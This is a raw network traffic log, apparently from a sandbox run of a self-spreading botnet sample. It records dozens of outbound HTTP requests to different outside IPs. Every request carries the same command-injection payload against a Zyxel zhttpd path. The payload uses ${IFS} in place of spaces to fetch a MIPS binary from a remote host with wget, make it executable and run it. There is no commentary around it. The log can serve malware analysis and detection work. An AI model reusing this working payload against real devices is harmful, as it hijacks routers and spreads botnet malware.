                                            Feb 2, 2024 06:21:21.796335936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6476192.168.2.1534740171.129.246.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796377897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6477192.168.2.1551896222.67.83.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796402931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6478192.168.2.153704883.64.253.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796427965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6479192.168.2.1553124201.174.4.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796493053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6480192.168.2.1543308121.152.166.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796519995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6481192.168.2.1545176202.186.94.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796552896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6482192.168.2.1552946176.224.241.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796592951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6483192.168.2.1536722210.211.27.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796650887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6484192.168.2.153760838.122.143.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796672106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6485192.168.2.1548630207.227.246.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796727896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6486192.168.2.1547788140.141.217.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796761990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6487192.168.2.1533080102.133.54.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796804905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6488192.168.2.1544678167.30.247.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796832085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6489192.168.2.154258078.247.156.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796889067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6490192.168.2.1547056206.125.107.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796907902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6491192.168.2.154558493.165.155.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796950102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6492192.168.2.1535654169.13.4.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.796997070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6493192.168.2.1551800104.247.1.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797046900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6494192.168.2.1545656149.232.3.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797087908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6495192.168.2.1551966194.178.52.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797120094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6496192.168.2.155177046.113.72.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797178984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6497192.168.2.154917678.148.112.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797199011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6498192.168.2.156053224.116.45.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797243118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6499192.168.2.1538658146.173.119.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797300100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6500192.168.2.154868072.135.202.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797329903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6501192.168.2.1554708150.18.185.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797399044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6502192.168.2.1541000151.194.79.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797416925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6503192.168.2.1560202223.207.87.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797449112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6504192.168.2.1547886116.53.100.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797501087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6505192.168.2.1535760115.91.59.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797534943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6506192.168.2.155548639.208.66.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797570944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6507192.168.2.1546706158.147.253.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797633886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6508192.168.2.154472859.124.30.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797679901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6509192.168.2.155262218.41.207.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797704935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6510192.168.2.1560306165.127.195.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797761917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6511192.168.2.1552190206.82.228.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797785997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6512192.168.2.15563928.177.62.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797823906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6513192.168.2.1560976191.152.86.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797863007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6514192.168.2.155090663.170.93.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797899008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6515192.168.2.1538860186.34.96.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797952890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6516192.168.2.1542060149.20.224.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.797983885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6517192.168.2.155439476.221.135.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798017979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6518192.168.2.1550074182.138.90.247443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798060894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6519192.168.2.154368893.155.4.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798091888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6520192.168.2.1543518132.153.42.218443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798136950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6521192.168.2.1549604137.140.184.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798185110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6522192.168.2.1560120173.126.167.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798213005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6523192.168.2.1541854202.110.32.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798244953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6524192.168.2.153684444.235.184.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798276901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6525192.168.2.155419272.168.189.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798300028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6526192.168.2.155741499.85.81.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798326969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6527192.168.2.1552004192.213.52.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798377991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6528192.168.2.1539936132.211.138.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798437119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6529192.168.2.1539760211.106.87.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798469067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6530192.168.2.1549930203.201.206.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798499107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6531192.168.2.1544726111.27.144.22443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798531055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6532192.168.2.153489061.192.91.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798574924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6533192.168.2.153396048.34.160.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798623085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6534192.168.2.155885479.193.198.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798669100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6535192.168.2.155859444.45.81.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798721075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6536192.168.2.1555452166.173.231.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798768044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6537192.168.2.154851254.8.41.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798784018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6538192.168.2.155774686.32.18.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.798810005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6539192.168.2.1539390175.163.63.135443
                                            TimestampBytes transferredDirectionData
